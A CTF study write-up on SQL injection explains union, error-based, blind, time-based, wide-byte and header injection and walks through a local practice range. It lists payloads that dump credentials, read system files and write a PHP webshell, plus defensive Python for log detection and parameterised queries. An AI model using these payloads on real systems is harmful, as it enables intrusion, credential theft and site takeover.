CTF study notes - SQL injection

SQL injection

Classification of SQL injection

1) Injection with echo (the query result is visible)

Union query injection
Error-based injection
Out-of-band injection: the injected query triggers DNS requests, so the data is echoed through DNS

2) Injection without echo

Boolean-based blind injection
Time-based blind injection

3) Second-order injection

It usually appears in challenges with complex business logic, and you generally need to write your own script to automate the injection. SQL injection is very common in CTF competitions and involves various databases. In a typical CTF, the challenge author adds a disguised layer of WAF (for example, keyword filtering) and leaves only one intended solution path. We then need to quickly find and bypass that point and get the flag.

Union query injection

This type generally echoes the query result. Close the single quote, then comment out the rest of the original statement after the injected union query. Usually some specific words (space, select, and, or, etc.) need to be bypassed.

Error-based injection

1) updatexml

In essence, the function is made to report an error.

Function signature:

updatexml(XML_document,XPath_string,new_value);
  • XML_document: a string, the name of the XML document object;

  • XPath_string: a string in XPath format;

  • new_value: a string that replaces the data found in the document that matches the XPath;

The principle of error-based injection: concat() joins the query result into a string that does not conform to the XPath_string format, so the function throws a syntax error, and the error message, which contains that string, is displayed to the user.

0x7e is the ASCII code of the ~ character. The error message of updatexml() shows the content starting from the first special character, so to avoid losing the leading letters of the result, a special character is concatenated at the beginning.

Common error-based injection statements

Query the database version
and (updatexml(1,concat(0x7e,(select version()),0x7e),1))

Query the current database
and (updatexml(1,concat(0x7e,(select database()),0x7e),1))

Get the table names of the current database
and (updatexml(1,concat(0x7e,(select(select group_concat(table_name) from information_schema.tables where table_schema=database())),0x7e),1))

Query the columns of a table
and (updatexml(1,concat(0x7e,(select(select group_concat(column_name) from information_schema.columns where table_schema =database() and table_name='users')),0x7e),1))

Query the contents of the columns
and (updatexml(1,concat(0x7e,(select(select group_concat(concat(role,0x7e,username,0x3A,password,0x7e)) from users)),0x7e),1))

2) floor

Simply put, floor() error reporting exploits the conflict between rand() and group by. When group by inserts rows into its temporary table, rand() is evaluated more than once, so a duplicate primary key is inserted into the temporary table and an error is raised. Because the SQL statement or function inside concat() was executed before the error was raised, the duplicate key reported in the error message is the result of that statement or function.

For the detailed principle, refer to https://www.secpulse.com/archives/140616.html or the CSDN article "Analysis of floor error injection principle" by migi@forever.

Dump the database name
id=1' and (select 1 from (select count(*),concat(0x7e,(select database()),0x7e,floor(rand(0)*2)) x from information_schema.tables group by x) a) %23

Dump the table names
id=1' and (select 1 from (select count(*),concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e,floor(rand(0)*2)) x from information_schema.tables group by x) a) %23

Dump the column names
id=1' and (select 1 from (select count(*),concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x7e,floor(rand(0)*2)) x from information_schema.tables group by x) a) %23

Dump the contents
id=1' and (select 1 from (select count(*),concat(0x7e,(select concat_ws(':',username,password) from users limit 0,1),0x7e,floor(rand(0)*2)) x from information_schema.tables group by x) a) %23

3) exp

exp() error reporting is essentially an overflow error. exp() is the exponential function with base e; when the argument is too large the result overflows. The exp function overflows and reports an error when its argument is greater than 709.

Through a subquery and bitwise negation (~), a DOUBLE overflow error is caused and the data is carried in the error message:

mysql> select * from users where id=1 and exp(~(select * from (select database())a));
ERROR 1690 (22003): DOUBLE value is out of range in 'exp(~((select `a`.`database()` from (select database() AS `database()`) `a`)))'

Some expressions in the error message are converted into the corresponding strings by the scripting language, which makes error-based injection possible.

4) Other

For more on error-based injection, see the CSDN article "SQL Injection - Error Injection" by Qwzf.

Boolean blind injection

When the developer suppresses the error message, we cannot perform error-based injection. But true and false still produce different responses, for example granting access when true and refusing when false, or returning the normal page when true and jumping to an error page when false.

The principle of Boolean blind injection is to use and or or to append a statement that returns a Boolean value. When the statement is true the page shows one result, and when it is false it shows another, so we can judge whether the statement is true and extract information from that. It is time-consuming and laborious, so tools or scripts are generally used.

The main characteristics of Boolean-based blind injection:
1. No error message
2. Whether the input is correct or wrong, only two kinds of page are displayed (think of them as 0 or 1)
3. With a correct input, appending and 1=1 / and 1=2 shows that the two cases can be distinguished

Process

1. Determine whether injection exists:
id=1'and 1=2#. If the page shows an abnormal result, the content after and was executed, so there may be Boolean-type SQL injection.

2. Dump the database name (sample):

id=1'and length(database())>10#-- database name length

id=1'and ascii(mid(database(),1,1))>115#-- database name

3. Dump the table names (sample):

id=1'and ascii(mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100#

4. Dump the column names (sample):

id=1'and ascii(mid((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 0,1),1,1))>100#

5. Dump the data (sample):

id=1'and ascii(mid((select username from users limit 0,1),1,1))>1#

Common functions (the original shows screenshots of the function tables)

1) String interception functions (e.g. mid, substr)

2) Conversion functions (e.g. ascii)

3) Comparison functions

Time-based blind injection

sleep() is a function used for sleeping in SQL statements and is commonly used in time-based blind injection; sleep(x) makes the program sleep for x seconds.

1. Determine whether injection exists:

id=1'and sleep(10)# If the web page's response is noticeably delayed, time-based SQL injection exists.

2. Dump the database name (sample):

id=1'and sleep(if(length(database())>10,10,1))#-- database name length

id=1'and sleep(if(ascii(mid(database(),1,1))>115,10,1))#-- database name

3. Dump the table names (sample):

id=1'and sleep(if((ascii(mid((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>100),10,1))#

4. Dump the column names (sample):

id=1'and sleep(if(ascii(mid((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 0,1),1,1))>100,10,1))#

5. Dump the data (sample):

id=1'and sleep(if(ascii(mid((select username from users limit 0,1),1,1))>1,10,1))#

Common functions (screenshot in the original)

1) Delay functions (e.g. sleep)
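As an added defender-side example (not from the original notes), the following Python classifier tags the request signatures of the error-based, union, Boolean and time-based payloads listed above when run over web-server access logs. The log lines, IPs and paths are constructed samples; the patterns are only a first-pass heuristic and flagged lines still need review.

```python
import re
from urllib.parse import unquote_plus

# One regex per technique family described in these notes, matched against
# the URL-decoded, lower-cased request target.
SIGNATURES = {
    "error-based": re.compile(
        r"updatexml\s*\(|extractvalue\s*\(|floor\s*\(\s*rand\s*\(|\bexp\s*\(\s*~"),
    "time-based": re.compile(r"\bsleep\s*\(|\bbenchmark\s*\("),
    "boolean-based": re.compile(
        r"\band\s+\d+\s*=\s*\d+|\band\s+'[^']*'\s*=\s*'|ascii\s*\(\s*(?:mid|substr)\s*\("),
    "union-based": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "schema-enum": re.compile(r"information_schema\.(?:tables|columns)"),
    "file-access": re.compile(r"load_file\s*\(|into\s+(?:out|dump)file\b"),
}

# Wide-byte probes are spotted on the still percent-encoded target: a lone
# byte >= 0x80 directly before a quote. This is a heuristic; legitimate
# UTF-8 text whose last byte precedes a quote also matches and needs review.
WIDE_BYTE = re.compile(r"%[89a-f][0-9a-f](?:%27|')", re.IGNORECASE)

# Common/combined log prefix: enough to pull out the client IP and target.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+)')


def classify(raw_target: str):
    """Return the set of technique families visible in one request target."""
    decoded = unquote_plus(raw_target).lower()
    hits = {name for name, rx in SIGNATURES.items() if rx.search(decoded)}
    if WIDE_BYTE.search(raw_target):
        hits.add("wide-byte")
    return hits


def scan_log(lines):
    """Return (ip, target, families) for every line that trips a signature."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        families = classify(m.group("target"))
        if families:
            findings.append((m.group("ip"), m.group("target"), families))
    return findings


# Constructed sample access-log lines (hypothetical hosts, IPs and paths)
# carrying the kinds of payloads listed in this section.
SAMPLE_LOG = [
    '10.0.0.5 - - [25/Aug/2022:11:12:00 +0800] "GET /vul/sqli/sqli_id.php?id=2&submit=%E6%9F%A5%E8%AF%A2 HTTP/1.1" 200 512',
    '10.0.0.9 - - [25/Aug/2022:11:12:03 +0800] "GET /vul/sqli/sqli_id.php?id=1%20and%20(updatexml(1,concat(0x7e,(select%20database()),0x7e),1)) HTTP/1.1" 500 231',
    '10.0.0.9 - - [25/Aug/2022:11:12:05 +0800] "GET /vul/sqli/sqli_str.php?name=fancy%27%20union%20select%201,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()%23 HTTP/1.1" 200 640',
    '10.0.0.9 - - [25/Aug/2022:11:12:19 +0800] "GET /vul/sqli/sqli_id.php?id=1%27and%20sleep(if(length(database())%3E10,10,1))%23 HTTP/1.1" 200 512',
    '10.0.0.9 - - [25/Aug/2022:11:12:21 +0800] "GET /vul/sqli/sqli_blind_b.php?name=kobe%27%20and%20ascii(substr(database(),1,1))%3E113%23 HTTP/1.1" 200 512',
    '10.0.0.9 - - [25/Aug/2022:11:12:30 +0800] "GET /vul/sqli/sqli_widebyte.php?name=kobe%df%27%20union%20select%201,2%23 HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for ip, target, families in scan_log(SAMPLE_LOG):
        print(ip, sorted(families), target[:60])
```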

Second-order injection

Second-order injection happens because some filtering and escaping were performed when the data first entered the database; when that data is later retrieved from the database and spliced into a SQL statement without being filtered again, the SQL statement we constructed is executed.
Since the business logic of second-order injection is complicated, it is generally hard to find in a competition, so the challenge author usually releases the source code or hints that there is a second-order injection in the challenge.
Second-order injection challenges are usually not simple; they are generally combined with error-based or Boolean blind injection. For example, the username entered on the registration page is only echoed after logging in, so we need to write a script that simulates registration and login.

Injection after LIMIT

Research found that when the MySQL version is greater than 5.0.0 and less than 5.6.6, injection can be performed at the following location: SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT {injection_point}. The following payload can also be used:
SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyze(extractvalue(rand(),concat(0x3a,version())),1);

Location and discovery of injection points

1. Common injection point locations
In CTF, the injection point is not necessarily the username field of a form; sometimes it is hidden in different places. A few common injection point locations are introduced below.
(1) Injection in GET parameters
The injection point in GET is generally the easiest to find, because the URL and parameters are visible in the address bar, and we can use sqlmap or manual testing to verify whether injection exists.
(2) Injection in POST
The injection point in POST generally has to be found by capturing packets, for example using Burp or the browser plug-in HackBar to send POST requests. Likewise, sqlmap or manual verification can be used.
(3) Injection in User-Agent
To look for injection in User-Agent, I recommend Burp's Repeater module or sqlmap. Set sqlmap's level=3 so that it automatically tests the User-Agent for injection.
(4) Injection in Cookies
To look for injection in Cookies, I also recommend Burp's Repeater module. In sqlmap, set level=2 so that it automatically tests the Cookies for injection.

2. Judging whether an injection point exists
The next step is to determine the location of the injection point. When judging whether there is an injection at an input point, you can first make an assumption about the SQL statement executed by the original program

Then use the following methods to judge:
(1) Inserting a single quote
Inserting a single quote is the most commonly used detection method. The principle is that an unclosed single quote causes a "quote not closed" error in the SQL statement.
(2) Judging by a condition
Use and 1=1 (numeric type) or the quote-closing test statement ' and '1'='1 (string type). The purpose of the payload '1'='1 is to close the trailing single quote of the original statement.
(3) Judging by arithmetic on the number
For example, if the link in the challenge is http://example.com/?id=2, we can try http://example.com/?id=3-1. If the result is the same as http://example.com/?id=2, it proves that there may be a SQL injection vulnerability at the id input point.
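The three checks above, reproduced against a real engine as an added example (not from the original notes): a numeric and a string concatenation point show the 3-1 / and 1=1 / ' and '1'='1 behaviour, and the parameterised versions beside them show why the same inputs stop working. It uses an in-memory SQLite table with hypothetical rows as a stand-in for the users table.

```python
import sqlite3

# Constructed in-memory stand-in for the users table used throughout these
# notes (hypothetical rows, not data from the original page).
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [(1, "admin"), (2, "pikachu"), (3, "test")])
    return conn


def vulnerable_numeric(conn, user_input: str):
    """Numeric injection point: the value is pasted in unquoted,
    i.e. `select * from users where id = x`."""
    sql = f"SELECT id, username FROM users WHERE id = {user_input}"
    return conn.execute(sql).fetchall()


def vulnerable_string(conn, user_input: str):
    """Character injection point: the value sits inside single quotes,
    i.e. `select * from users where username = 'x'`."""
    sql = f"SELECT id, username FROM users WHERE username = '{user_input}'"
    return conn.execute(sql).fetchall()


def safe_numeric(conn, user_input: str):
    """Fixed version: validate the type, then bind the value as a parameter.
    '3-1' or '2 and 1=1' are rejected by int() instead of reaching SQL."""
    return conn.execute("SELECT id, username FROM users WHERE id = ?",
                        (int(user_input),)).fetchall()


def safe_string(conn, user_input: str):
    """Fixed version: the bound text is compared as data, so a quote
    inside it never closes the literal."""
    return conn.execute("SELECT id, username FROM users WHERE username = ?",
                        (user_input,)).fetchall()


def run_probe(query_fn, conn, user_input: str):
    """Run one probe; return the rows, or an 'ERROR: ...' string when the
    engine rejects the statement (the 'unclosed quote' signal)."""
    try:
        return query_fn(conn, user_input)
    except (sqlite3.Error, ValueError) as exc:
        return f"ERROR: {exc}"


if __name__ == "__main__":
    db = make_db()
    # Against the vulnerable numeric point, '2' and '3-1' return the same
    # row and 'and 1=2' empties the result; the safe version rejects both.
    for probe in ("2", "3-1", "2 and 1=1", "2 and 1=2"):
        print("numeric", repr(probe), run_probe(vulnerable_numeric, db, probe),
              "| safe:", run_probe(safe_numeric, db, probe))
    for probe in ("admin", "admin'", "admin' and '1'='1", "admin' and '1'='2"):
        print("string", repr(probe), run_probe(vulnerable_string, db, probe),
              "| safe:", run_probe(safe_string, db, probe))
```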

Bypass

Reference: the CSDN article "Summary of SQL injection bypass methods" by huanghelouzi.

SQL read and write files

Some challenges contain SQL injection vulnerabilities, but the flag is not in the database. Then consider whether files can be read, or a shell written, to go further.

Basic conditions for reading and writing files:
The current user has permission to read the file.
The file is on this server.
The path is complete.
The file size is less than max_allowed_packet.
The current database user has the FILE privilege (File_priv is yes).
The value of secure_file_priv is empty. If the value is a directory, only files in that directory can be operated on.
(screenshot in the original)

Practice:

pikachu SQL injection - numeric injection (POST)

1. Page display

(screenshot in the original)

The page lets us select a number and returns the corresponding username and email.

2. Looking carefully at the page URL we find ?id=xxx, which does not change when we type manually, so we guess this challenge is a POST request rather than GET and that parameters cannot be passed through the URL.

3. We captured packets with Burp Suite and found that it was a GET request.

(screenshot in the original)

4. We modify the parameters and perform SQL injection.
First recall the basic SQL injection procedure:
1. Determine whether injection exists
2. Determine the number of columns
3. Determine the displayed columns
4. Determine the database name
5. Determine the table names
6. Determine the column names
7. Find the specific data
Injection obviously exists here, so we start directly from step 2.

1) Determine the number of columns

payload: id=3 order by 3&submit=%E6%9F%A5%E8%AF%A2
The result is as follows: (screenshot in the original)

Then the result of order by 2: (screenshot in the original)

From this we judge that the number of columns is 2.

2) Determine the displayed columns

It is actually obvious here that both columns are displayed, but we still try
the payload: id=3 union select 1,2&submit=%E6%9F%A5%E8%AF%A2
The result is as follows: (screenshot in the original)

The result shows that columns 1 and 2 are both displayed.

3) Determine the database name

payload:id=3 union select 1,database()&submit=%E6%9F%A5%E8%AF%A2

(screenshot in the original)

The result shows the database name is pikachu.

4) Determine the table names
payload: id=3 union select group_concat(table_name),2 from information_schema.tables where table_schema=database()#&submit=%E6%9F%A5%E8%AF%A2
The result is as follows: (screenshot in the original)

So we get the table names: httpinfo,member,message,users,xssblind

5) Determine the column names

Since we can judge that the data should be in the users table, we dump the columns of the users table.
payload: id=1 union select group_concat(column_name),2 from information_schema.columns where table_name='users'#&submit=%E6%9F%A5%E8%AF%A2
The result is as follows: (screenshot in the original)

6) Get the data

We dump the username and password columns.
payload:id=1 union select username,password from users#&submit=%E6%9F%A5%E8%AF%A2

The result is as follows: (screenshot in the original)

Thus this challenge is completed; in a typical CTF challenge the flag would be here. In terms of the knowledge points above, this challenge belongs to union query injection among the injections with echo.

7) Further cracking
I read tutorials online and found that this level goes further. The password values look like MD5 hashes, so we looked up the admin password hash on an online MD5 lookup site (cmd5.com).
(screenshot in the original)

The result: the password of admin is 123456, the password of pikachu is 000000, and the password of test is abc123.

8) Read a file
payload:id=1 union select load_file('C:/Windows/win.ini'),1 from users#&submit=%E6%9F%A5%E8%AF%A2

9) Write a backdoor
payload: id=1 union select 1,'<?php assert($_POST[1]);?>' into outfile 'D:\software\phpstudy_pro\WWW\pikachu-master\pikachu-master\1.php'#&submit=%E6%9F%A5%E8%AF%A2
At this point the backdoor has been written. Following the usual process, AntSword could be used to connect to it and gain control of the website. Since this is a practice range built locally, we simply open the file directory to check whether it was written successfully.

pikachu SQL injection - character injection (GET)

1. Interface display

The interface is an input box for the username. From the challenge name (get) we know this is a GET request, so we can pass parameters directly in the URL; Burp Suite is not needed.
(screenshot in the original)

Let's enter a random value first; we get a URL of the form ?name=xxx, and the page says the username you entered does not exist.
(screenshot in the original)

2. Injection with echo

We still follow the general process.
1) Determine the number of columns
payload:?name=fancy' order by 2%23&submit=%E6%9F%A5%E8%AF%A2

The %23 in the payload is #; because # has a special meaning in a URL, it has to be URL-encoded.
The result is as follows: (screenshot in the original)

We get the number of columns as 2.
2) Determine the displayed columns
payload:?name=fancy%27%20union%20select%201,2%23&submit=查询

Note that since this is character injection, the payload differs from the numeric payload of the previous level: there is an extra ' (%27) to close the string.
The result is as follows: (screenshot in the original)
3) Determine the database
payload:?name=fancy%27%20union%20select%201,database()%23&submit=查询

Database name: pikachu

4) Determine the table names
payload: ?name=fancy%27%20union%20select%201,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()%23&submit=查询
Result: httpinfo, member, message, users, xssblind
5) Determine the column names

payload: ?name=fancy%27%20union%20select%201,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27%23&submit=查询
Result: USER, CURRENT_CONNECTIONS, TOTAL_CONNECTIONS, id, username, password, level
(The first three come from performance_schema.users, because this query does not restrict table_schema; adding where table_schema=database() as in step 4 filters them out.)
6) Get the specific data
payload: ?name=fancy' union select username,password from users%23&submit=%E6%9F%A5%E8%AF%A2
Result: (screenshot in the original)

7) Read a file

payload:http://192.168.101.16/pikachu/vul/sqli/sqli_str.php?name=fancy' union select 1,load_file('C:/Windows/win.ini')%23&submit=%E6%9F%A5%E8%AF%A2
8) Write a webshell
payload:http://192.168.101.16/pikachu/vul/sqli/sqli_str.php?name=fancy' union select 1,'<?php assert($_POST[2]); ?>' into outfile 'C:/phpstudy_pro/WWW/pikachu/vul/sqli/2.php'%23&submit=%E6%9F%A5%E8%AF%A2

All in all, for these two challenges just pay attention to the difference between GET and POST and the difference in payload structure; the process and content are otherwise the same.

The difference between numeric injection and character injection

Numeric type

When the input parameter x is an integer, the SQL statement in the source code is generally of the form: select * from <表名> where id = x

This type can be judged with the classic and 1=1 and and 1=2:
Enter the URL www.xxx.com/abc.php?id=x and 1=1; the page still works normally, so proceed to the next step.

If you then enter the URL www.xxx.com/abc.php?id=x and 1=2 and the page errors, it means the SQL injection is numeric.

Character type

When the input parameter x is a string, the SQL statement in abc.php is generally of the form

select * from <表名> where id = 'x'

We can likewise use and '1'='1 and and '1'='2 to judge this type:

Enter the URL www.xxx.com/abc.php?id=x' and '1'='1

The page works fine; move on to the next step.

Then enter the URL www.xxx.com/abc.php?id=x' and '1'='2

If the page errors, it means the SQL injection is character type.

pikachu SQL injection - search injection

The SQL statement behind search injection is roughly of the form select xxcolumns from xxtable where param like '%input%'. It is essentially still character injection, but the closing is different.

1. Interface display
(screenshot in the original)
2. Idea analysis

Since it is a search type, the first thing to do is to close the search string, then append our own query statement to form the payload.

1) We first use a ' to test whether this is the closing character
?name=ad'&submit=搜索

The result is as follows: (screenshot in the original)

Let's try again with ?name=ad%27%23&submit=搜索; the result has no error, indicating that this is the closing method.

3. Continue injecting

The remaining idea is almost the same as the previous challenge, so it is omitted here.

pikachu SQL injection - "xx" type injection

It is essentially still character injection, but the closing is not so simple. The key to this challenge is to find the closing sequence.

1. Test
First use the payload: ?name=fancy'&submit=%E6%9F%A5%E8%AF%A2. The result is as follows: (screenshot in the original)

From this we judge that the closing sequence is '), so we use the payload: ?name=fancy')%23&submit=%E6%9F%A5%E8%AF%A2. No error is reported, showing the guess is correct.

(screenshot in the original)

The following steps are the same as before and are omitted here.

pikachu SQL injection - insert injection (blind injection)

The SQL statement behind insert-type injection is roughly of the form INSERT INTO table_name VALUES (value 1, value 2,…) or INSERT INTO table_name (column 1, column 2,…) VALUES (value 1, value 2,…).

The SQL statement behind update-type injection is roughly of the form UPDATE table_name SET column_name = new_value WHERE column_name = some_value.

1. Interface display

(screenshot in the original)

(1) Insert injection
If there is an insert injection, it should be on the registration page where data is inserted. Since there is no echo, we use error-based injection. So we go to the registration page, whose content is as follows:

(screenshot in the original)

First we capture a packet and find that it is a POST request. The parameters are as follows:
(screenshot in the original)

So we look for the closing sequence and add ') after the last parameter, as shown in the figure below.

(screenshot in the original)

We find that this is indeed the closing sequence, but since the page has no echo, it cannot be operated like the previous challenges. However, the previous step shows that if there is a problem with the SQL statement during registration, an error is reported, so we use error-based injection.

1) Dump the database name
payload:username=xixi' or updatexml(1,concat(0x7e,(select database()),0x7e),1) or '&password=666666&sex=&phonenum=&email=&add=&submit=submit

(screenshot in the original)

2) Dump the table names
payload:username= ' or updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,31),0x7e),1) or '&password=666666&sex=&phonenum=&email=&add=&submit=submit

payload: username= ' or updatexml(1,concat(0x7e,substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),32,31),0x7e),1) or '&password=666666&sex=&phonenum=&email=&add=&submit=submit
Note: There are two payloads here because the data length exceeds the display range of the updatexml error message (32 characters are shown), so substr() is added to the payload to display the remaining characters.

3) Dump the column names
payload:username= ' or updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name='users'),1,31),0x7e),1) or '&password=666666&sex=&phonenum=&email=&add=&submit=submit

payload:username= ' or updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name='users'),32,31),0x7e),1) or '&password=666666&sex=&phonenum=&email=&add=&submit=submit

payload:username= ' or updatexml(1,concat(0x7e,substr((select group_concat(column_name) from information_schema.columns where table_name='users'),63,31),0x7e),1) or '&password=666666&sex=&phonenum=&email=&add=&submit=submit

4) Dump the data

payload:username= ' or updatexml(1,concat(0x7e,substr((select group_concat(concat(username,';',password)) from users),1,31),0x7e),1) or '&password=666666&sex=&phonenum=&email=&add=&submit=submit

payload:username= ' or updatexml(1,concat(0x7e,substr((select group_concat(concat(username,';',password)) from users),32,31),0x7e),1) or '&password=666666&sex=&phonenum=&email=&add=&submit=submit

pikachu SQL injection - update injection

The update injection is in the personal information modification page. We first register an account and log in. After logging in there is a button to modify personal information; click it and the interface is as follows:

(screenshot in the original)

Then capture the packet and find that this is still a POST request; the rest of the operation is almost the same as for insert.

pikachu SQL injection - delete injection

The SQL statement behind delete-type injection is roughly of the form DELETE FROM table_name WHERE column_name = value.
Interface display: (screenshot in the original)

Since it is a delete injection, let's add a message first, then capture the delete operation; we find several GET request packets.
(screenshot in the original)

Then we should think of injecting through the URL; we have already covered the injection method for GET requests. Moreover, there is no direct echo here, so we use error-based injection.

1) Dump the database name
payload:?id=57 or updatexml(1,concat(0x7e,(select database()),0x7e),1)

(screenshot in the original)

Note: here we need to inject in the web page's URL, not directly in Burp Suite:

(screenshot in the original)

Doing it in Burp Suite results in the following error:

(screenshot in the original)

2) The rest is omitted; the payloads are exactly the same as for insert injection.

pikachu SQL injection - HTTP header injection

Interface display:

This is the initial interface:

(screenshot in the original)

If we observe carefully, we find a prompt in the upper right corner which directly gives us the username and password.
(screenshot in the original)

After we enter the username and password, it looks like this:

(screenshot in the original)

This challenge is very interesting. The website does not care about your username and password, but records your User-Agent and HTTP Accept information, as well as your host (IP address). Although it is also a POST request, injecting through the POST parameters is obviously not appropriate here; after all, the challenge says it is HTTP header injection.
We first captured the packets and found the following:
(screenshot in the original)

At this point, did someone try injecting into the POST packet? Well, I tried it here, but it does not work, because it seems to be automatically redirected to another page, so what we really need to deal with is the following GET request packet.

1) Determine whether injection exists
We first manipulate the User-Agent and add a ' after it (because the User-Agent is a string, we have reason to suspect it is closed with '). If an error is reported, it means injection is possible here.

(screenshot in the original)

2) Dump the database name

We modify the header to User-Agent: 1' or updatexml(1,concat(0x7e,database()),0) or ' and get:

(screenshot in the original)

The subsequent operation is the conventional error-based injection process.

Boolean Blind


1) Judging whether injection exists
1. Input kobe' and 1=1#, and you get:

(screenshot in the original)

2. Input kobe' and 1=2#, and you get:

(screenshot in the original)

From this we find that the page displays different content when the condition is true and when it is false. So the idea is to append conditional statements after and and determine whether our condition is correct in order to find the answer.

Test examples are given below:
kobe' and ascii(substr(database(),1,1))>113#

kobe' and ascii(substr((select TABLE_NAME from INFORMATION_SCHEMA.tables where TABLE_SCHEMA=database() limit 0,1),1,1))<112#

Time-based blind injection

With time-based blind injection you cannot see anything and cannot tell from differences in the display whether your statement was executed. So what to do? Use sleep().

1) Judging the injection
With kobe' and sleep(3)# we can clearly feel that the response is delayed for a while before the page renders, so we can judge that injection exists.

2) Continue judging
We can use statements such as kobe' and if((substr(database(),1,1))='p',sleep(5),null)# to judge whether our guess is right and find the answer step by step, but it is extremely time-consuming and troublesome.

Wide-byte injection

Principle:

(1) The condition for wide-byte injection is that when PHP sends requests to MySQL, the statement SET NAMES 'gbk' or set character_set_client=gbk is used, so the connection uses a multi-byte encoding.

(2) The reason wide-byte injection is needed is that special characters such as single and double quotes are escaped.

(3) The principle of wide-byte injection is: the \ used for escaping is ASCII-encoded, while the parameters passed in by the client are decoded as a wide-byte encoding such as GBK. Inserting a byte before the \ whose ASCII code is greater than 128 (reaching the range of Chinese characters) makes MySQL treat that byte and the \ as one Chinese character, thereby eating the \ and destroying the escape.

We first use Burp Suite to capture packets and change the parameters in the data area. First we fill in kobe, since this is a known user.

(screenshot in the original)

1) Judging the injection
We enter the following content: name=kobe%df' union select 1,2#&submit=%E6%9F%A5%E8%AF%A2

(screenshot in the original)

This indicates that injection exists, and the displayed columns are 1 and 2.

2) Dump the database name

name=kobe%df' union select database(),user() #&submit=%E6%9F%A5%E8%AF%A2

(screenshot in the original)

I won't go into detail for the remaining steps; just follow the same pattern, remembering to avoid the ' symbol.

3) Points to note

1. A statement such as union select 1,table_name from information_schema.tables where table_name='users'# is not acceptable. This is because the ' is escaped by addslashes(), which causes an error.

2. When the injection is performed on the page itself, it also fails. This is because when the request packet is sent, the data we entered is URL-encoded, and %df is turned into %25df.
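As an added illustration (not from the original notes) of why the %df byte defeats the escaping: the PHP addslashes() escaping and the server-side charset decoding are simulated with Python's own codecs, so it runs offline. The probe bytes are the kobe%df' input from this section after URL decoding; the same code also shows note 1 above, where the escaping breaks the quotes around 'users'. The fix it demonstrates is a connection charset such as UTF-8 in which 0x5C can never be the trailing byte of a character (plus prepared statements, which never re-parse the value at all).

```python
def addslashes(data: bytes) -> bytes:
    """Byte-wise escaping like PHP addslashes(): a backslash (0x5C) is put
    before ' " \\ and NUL. It knows nothing about the connection charset."""
    out = bytearray()
    for b in data:
        if b in b"'\"\\\x00":
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def server_view(escaped: bytes, charset: str) -> str:
    """How the SQL parser sees the escaped bytes after decoding them in the
    connection charset (set by SET NAMES); undecodable bytes become U+FFFD."""
    return escaped.decode(charset, errors="replace")


def has_unescaped_quote(text: str) -> bool:
    """True if some ' is not preceded by a backslash, i.e. the attacker's
    value can terminate the string literal."""
    return any(ch == "'" and (i == 0 or text[i - 1] != "\\")
               for i, ch in enumerate(text))


def demo(probe: bytes = b"kobe\xdf'") -> dict:
    """Compare the same escaped bytes under a GBK and a UTF-8 connection.
    The default probe is the constructed kobe%df' input, URL-decoded."""
    escaped = addslashes(probe)             # kobe \xdf \x5c \x27
    gbk = server_view(escaped, "gbk")       # \xdf\x5c fuses into one hanzi
    utf8 = server_view(escaped, "utf-8")    # \xdf alone is invalid; \x5c stays
    return {
        "escaped_bytes": escaped,
        "gbk_view": gbk,
        "gbk_quote_escaped": not has_unescaped_quote(gbk),
        "utf8_view": utf8,
        "utf8_quote_escaped": not has_unescaped_quote(utf8),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:>20}: {value!r}")
    # Note 1 of this section: addslashes() also mangles the quotes the
    # query needs, so table_name='users' arrives as table_name=\'users\'.
    print(addslashes(b"table_name='users'"))
```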

Origin blog.csdn.net/xuanyulevel6/article/details/126521051